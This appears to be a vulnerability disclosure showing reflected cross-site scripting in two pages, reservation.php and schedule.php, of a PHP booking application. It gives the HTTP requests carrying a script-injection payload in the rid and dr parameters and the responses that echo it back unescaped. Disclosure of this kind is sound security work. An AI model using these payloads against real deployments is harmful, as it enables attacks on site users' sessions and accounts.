Description
- It was found that the application suffered from Reflected XSS on several pages
Reflected XSS #1 - "resevervation.php"
// HTTP GET request
GET /Bookedbo8effotfu/Web/
reservation.php?rid="><script>alert(document.domain)</script> HTTP/1.1
Host: localhost
Cookie: PHPSESSID=7c0a0ee0b401863e1a30acbebf301916; language=en_gb; new_version=v%3D2.8.5%2Cfs%3D1728734988; fus_session=a15fcb9ef40abd1dece4c7fc35c2b58c; fus_visited=yes
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0
[...]
// HTTP response
HTTP/1.1 200 OKDate: Sat, 12 Oct 2024 12:23:55 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
[...]
<h5><a href="//localhost/Bookedbo8effotfu/Web/reservation.php?rid="><script>alert(document.domain)</script>">Return to the last page that you were on</a></h5>
</div>
Reflected XSS #2 - "schedule.php"
// HTTP GET request
GET /Bookedldk0euwfjx/Web/
schedule.php?dr="><script>alert(document.domain)</script> HTTP/1.1
Host: localhost
Cookie: PHPSESSID=c7aa15661bb6b0b72ab88132664b75c9; language=en_gb; resource_filter1=%7B%22ScheduleId%22%3A%221%22%2C%22ResourceIds%22%3A%5B%5D%2C%22ResourceTypeId%22%3Anull%2C%22MinCapacity%22%3Anull%2C%22ResourceAttributes%22%3A%5B%5D%2C%22ResourceTypeAttributes%22%3A%5B%5D%7D; schedule_calendar_toggle=false
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0
[...]
// HTTP response
HTTP/1.1 200 OK
Date: Sat, 19 Oct 2024 09:12:33 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
[...]
<h5>
<a href="//localhost/Bookedldk0euwfjx/Web/schedule.php?dr="><script>alert(document.domain)</script>">Return to the last page that you were on